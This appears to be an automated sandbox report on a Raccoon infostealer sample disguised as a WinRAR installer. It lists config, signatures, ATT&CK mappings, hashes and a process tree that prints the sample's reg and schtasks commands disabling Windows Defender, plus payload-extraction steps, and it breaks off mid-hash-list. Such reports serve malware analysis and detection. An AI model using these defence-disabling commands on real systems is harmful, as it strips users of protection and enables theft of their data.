Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    19-04-2022 02:29

General

  • Target

    7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.exe

  • Size

    8.7MB

  • MD5

    5cb6b5c313be5f64cb6674a947dfed25

  • SHA1

    b0e4e82bb29ab7b466d1b55836f69b69bd6413ab

  • SHA256

    7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1

  • SHA512

    116dc5cc4e3e256a1183825fdac27c12f968f072788cfb5d1ed6620b1d2e84cab5d5d3dca227d11ba3076bbd5b9e03ff3779d530dd6e207c680551ade4dd1795

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

0422feff6c251ddfdca83125d9b8ae570db3b316

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 5 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.exe
    "C:\Users\Admin\AppData\Local\Temp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Users\Admin\AppData\Local\Temp\is-P715Q.tmp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-P715Q.tmp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.tmp" /SL5="$70022,8444300,734720,C:\Users\Admin\AppData\Local\Temp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\50gbDpH\MMF.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\50gbDpH\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1728
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:1824
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:844
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                5⤵
                  PID:2012
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  5⤵
                    PID:1044
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:1864
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:1800
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:368
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:1936
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:1388
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1924
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:1624
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:1712
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:1888
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:1488
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:828
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:1412
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:288
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:1492
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:1604
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:1020
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:544
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:1532
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:940
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:1776
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:1988
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:388
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:1900
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:1992
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:1972
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:1288
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:1944
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:1932
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\ProgramData\50gbDpH\main.bat" "
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:1112
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:884
                                                                          • C:\ProgramData\50gbDpH\7z.exe
                                                                            7z.exe e file.zip -p___________24167pwd79pwd22684___________ -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1916
                                                                          • C:\ProgramData\50gbDpH\7z.exe
                                                                            7z.exe e extracted/file_3.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1180
                                                                          • C:\ProgramData\50gbDpH\7z.exe
                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:988
                                                                          • C:\ProgramData\50gbDpH\7z.exe
                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1204
                                                                          • C:\ProgramData\50gbDpH\nmhost.exe
                                                                            "nmhost.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetThreadContext
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:880
                                                                            • C:\ProgramData\50gbDpH\nmhost.exe
                                                                              "nmhost.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:828
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ""C:\ProgramData\50gbDpH\DiskRemoval.bat" "
                                                                          4⤵
                                                                            PID:1792
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /T 60 /NOBREAK
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1600
                                                                        • C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe
                                                                          "C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2032
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SPPTN.tmp\WinRAR_5.80_x86_x64.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SPPTN.tmp\WinRAR_5.80_x86_x64.tmp" /SL5="$101BC,4261591,148992,C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:1176

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Modify Existing Service

                                                                    2
                                                                    T1031

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    2
                                                                    T1112

                                                                    Disabling Security Tools

                                                                    1
                                                                    T1089

                                                                    Discovery

                                                                    System Information Discovery

                                                                    1
                                                                    T1082

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe
                                                                      Filesize

                                                                      4.5MB

                                                                      MD5

                                                                      627395c5dc64f63431244ea1cb6b660e

                                                                      SHA1

                                                                      332d8b47dd7af987095230b06dac878c81b69b57

                                                                      SHA256

                                                                      43db92139af11e592a35d2557291a4d1122d9863c2195d031b12bd8e8fac0b53

                                                                      SHA512

                                                                      260219e29623acadb6a4a72380c45a5c8420ba85b1a9475da96ed4a2e650d2aa9812879563bd20f42ff930ab88da7fc9842ef69052135ce6c17ed71289e710f7

                                                                    • C:\Program Files (x86)\WinRAR_5.80_x86_x64.exe
                                                                      Filesize

                                                                      4.5MB

                                                                      MD5

                                                                      627395c5dc64f63431244ea1cb6b660e

                                                                      SHA1

                                                                      332d8b47dd7af987095230b06dac878c81b69b57

                                                                      SHA256

                                                                      43db92139af11e592a35d2557291a4d1122d9863c2195d031b12bd8e8fac0b53

                                                                      SHA512

                                                                      260219e29623acadb6a4a72380c45a5c8420ba85b1a9475da96ed4a2e650d2aa9812879563bd20f42ff930ab88da7fc9842ef69052135ce6c17ed71289e710f7

                                                                    • C:\ProgramData\50gbDpH\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • C:\ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • C:\ProgramData\50gbDpH\DisableOAVProtection.bat
                                                                      Filesize

                                                                      33KB

                                                                      MD5

                                                                      c97c64f53865b9da2a642d36b02df043

                                                                      SHA1

                                                                      181ca1deb68409feae2e70ebf347b3111218a47a

                                                                      SHA256

                                                                      1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                      SHA512

                                                                      05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                    • C:\ProgramData\50gbDpH\DiskRemoval.bat
                                                                      Filesize

                                                                      211B

                                                                      MD5

                                                                      0f00552cee3a31dc4e8adc2738ca6d76

                                                                      SHA1

                                                                      85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                      SHA256

                                                                      1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                      SHA512

                                                                      137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                    • C:\ProgramData\50gbDpH\MMF.vbs
                                                                      Filesize

                                                                      20KB

                                                                      MD5

                                                                      fa6dcfa398aff28ba12687272732eb51

                                                                      SHA1

                                                                      f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                      SHA256

                                                                      f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                      SHA512

                                                                      9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                    • C:\ProgramData\50gbDpH\extracted\ANTIAV~1.DAT
                                                                      Filesize

                                                                      2.0MB

                                                                      MD5

                                                                      e177d8a197054920edc50c867c4d83c7

                                                                      SHA1

                                                                      93a9a13cb0e431d5d16c8d4656a71fe799e293b6

                                                                      SHA256

                                                                      91660c99fa87b69b7580ce7ce912120972e035f6ec058d9c1459f4f57098dfaf

                                                                      SHA512

                                                                      a39d0ee3e5f54366992dad2287bb2987b3d5aa4cb9b89354f43b36dcd57d466391e9927893803456a2b9fa19841eb0162dd2b4d97adba03ffe2005f1d51bd3a0

                                                                    • C:\ProgramData\50gbDpH\extracted\file_1.zip
                                                                      Filesize

                                                                      711KB

                                                                      MD5

                                                                      68c03d9f4ec112a706451e52ab0d0b6f

                                                                      SHA1

                                                                      70e4273937d277b2eb31cc355dafb614e7d92f0f

                                                                      SHA256

                                                                      2187fcb6ee171a80c7095fc4ce893ca4f543821a5dfed8e3ee4c16b5846cf5c2

                                                                      SHA512

                                                                      450255afb9105294a952bf53cb2ac6fdacfd000d10596b64e464566c3bdd23af127767ab4117b67195f4e6eed3e7b7470cd5254a2bc8e2c20f2a68dcfaf3cde0

                                                                    • C:\ProgramData\50gbDpH\extracted\file_2.zip
                                                                      Filesize

                                                                      711KB

                                                                      MD5

                                                                      465948131d48f0baa17e0bf956d05809

                                                                      SHA1

                                                                      76c9154637e706f48201c1f2714541d992c5566e

                                                                      SHA256

                                                                      79454b0e77c513282954fe6aaf30f1a7091ecb82044c5fc6c499fd8bc60fb1ce

                                                                      SHA512

                                                                      dc42c9261855682cdfbb5a6bf07d689f6485564fa31b66cdf4930ea10e4b06a92cb6b7d06989b57766a9032e2e5a3a685cf41b9b30faeb4947f4b676b26ff1c9

                                                                    • C:\ProgramData\50gbDpH\extracted\file_3.zip
                                                                      Filesize

                                                                      2.2MB

                                                                      MD5

                                                                      fd0491fdaf5981fb3a2838a05d0eebcf

                                                                      SHA1

                                                                      327109c15b1edfa7b414becefed917d5da249365

                                                                      SHA256

                                                                      a9b1c8af8081cd01593c16558871f9e9c6ee7b5ee7642a83091ffec7bc605fc8

                                                                      SHA512

                                                                      415cff0b902334733d392809f1b7d45df237eee94d962764a07ddd551af4847ee8fde3fa37aeccca37dcfee6afc786643fc167915bc3d505ae335b098106a639

                                                                    • C:\ProgramData\50gbDpH\extracted\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\ProgramData\50gbDpH\file.bin
                                                                      Filesize

                                                                      2.2MB

                                                                      MD5

                                                                      790b451c8430b0c527f9ede30cce5f29

                                                                      SHA1

                                                                      5de6843d48641c14023c7f07f631f2a364697ae3

                                                                      SHA256

                                                                      777753312bb53895bb19c12c968ad5948fd4adcc534dee97d32b570fd6b827a7

                                                                      SHA512

                                                                      168ab36305b68e145ff7623ea611dba3ac3e1d6354ae9b3b8f621a179d75c07bda2237057320b440bf6a553dc48ee3a23fb4cad44dc52dc0cb62b455d2a0aafd

                                                                    • C:\ProgramData\50gbDpH\main.bat
                                                                      Filesize

                                                                      397B

                                                                      MD5

                                                                      7bcce13698737af294fffe1859c19b80

                                                                      SHA1

                                                                      33cd5b5e0c5dc1f515f93928fa6a0b0e81f591cc

                                                                      SHA256

                                                                      d5fa298b9210682b6d0d181ba1db301aa3f7eec2c69d5728cdd5c979d905e16c

                                                                      SHA512

                                                                      c491517707fa34593c4e0b66228eab2866d2c36f59377b2f2328e3dd88653e5cd64bdd6d07bf8fc8481fee02f34cd01c1d836aebacf6ffb89ea67f3ff4aa8d18

                                                                    • C:\ProgramData\50gbDpH\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\ProgramData\50gbDpH\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-P715Q.tmp\7949bf47c55cb339d550fec6894d1d4705923c1667798bfe9b5adb7a5871efd1.tmp
                                                                      Filesize

                                                                      2.4MB

                                                                      MD5

                                                                      7525b0ada26ffcb0329c87d2a4b6a164

                                                                      SHA1

                                                                      5d59c7f1655b728a761f53bd9cb52eb759e2ce28

                                                                      SHA256

                                                                      7c4e8acf15ed3274382ec2d60a11850714f1909f2201c66f227d72b477b21a18

                                                                      SHA512

                                                                      d3c06db0299f3e09f34eaec1264cd2de7b92633280fbe08472e5b6bf76290126e39151b45839a989edf7982bbb47ede26273aba5d167e10dcad37a25fa2efc5a

                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SPPTN.tmp\WinRAR_5.80_x86_x64.tmp
                                                                      Filesize

                                                                      993KB

                                                                      MD5

                                                                      440ca4917f800049c615dc991ff8ecb9

                                                                      SHA1

                                                                      d8e4518ef6e981fb78f03aec351ffeef51e5b88a

                                                                      SHA256

                                                                      eb46f9cb6f013edb0900989ad4f6e3fe13c5fd3978ae6a1c14ca1c7182610b3a

                                                                      SHA512

                                                                      3bfb5ae70bd91023dd1903773fb8981bd5487813ead95347dd92e3a04908a008deb5283318ce5e2baa26654d5429b7a81ec6ceb3fca9cd2a63f6b63d6c9a4373

                                                                    • \Program Files (x86)\WinRAR_5.80_x86_x64.exe
                                                                      Filesize

                                                                      4.5MB

                                                                      MD5

                                                                      627395c5dc64f63431244ea1cb6b660e

                                                                      SHA1

                                                                      332d8b47dd7af987095230b06dac878c81b69b57

                                                                      SHA256

                                                                      43db92139af11e592a35d2557291a4d1122d9863c2195d031b12bd8e8fac0b53

                                                                      SHA512

                                                                      260219e29623acadb6a4a72380c45a5c8420ba85b1a9475da96ed4a2e650d2aa9812879563bd20f42ff930ab88da7fc9842ef69052135ce6c17ed71289e710f7

                                                                    • \ProgramData\50gbDpH\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • \ProgramData\50gbDpH\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • \ProgramData\50gbDpH\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • \ProgramData\50gbDpH\7z.dll
                                                                      Filesize

                                                                      1.6MB

                                                                      MD5

                                                                      72491c7b87a7c2dd350b727444f13bb4

                                                                      SHA1

                                                                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                      SHA256

                                                                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                      SHA512

                                                                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                    • \ProgramData\50gbDpH\7z.exe
                                                                      Filesize

                                                                      458KB

                                                                      MD5

                                                                      619f7135621b50fd1900ff24aade1524

                                                                      SHA1

                                                                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                      SHA256

                                                                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                      SHA512

                                                                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                    • \ProgramData\50gbDpH\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

                                                                      8bbaed842013fd3af024fb7a59e739eff9accd80

                                                                      SHA256

                                                                      b00766e885489dd8a35ed09bc4a18d027f290a80b17721abaecd7a8f37604158

                                                                      SHA512

                                                                      6c237f09b130b3db3525c3913e609b2e30d64373f343d18f68d5e1bfbd0b8cfc983337b05af5451ed044f9424e7001d1896bb6b8968971b6584757fc5a17670d

                                                                    • \ProgramData\50gbDpH\nmhost.exe
                                                                      Filesize

                                                                      1.2MB

                                                                      MD5

                                                                      afb2c0a5886354403bcdabb3c3f04e67

                                                                      SHA1

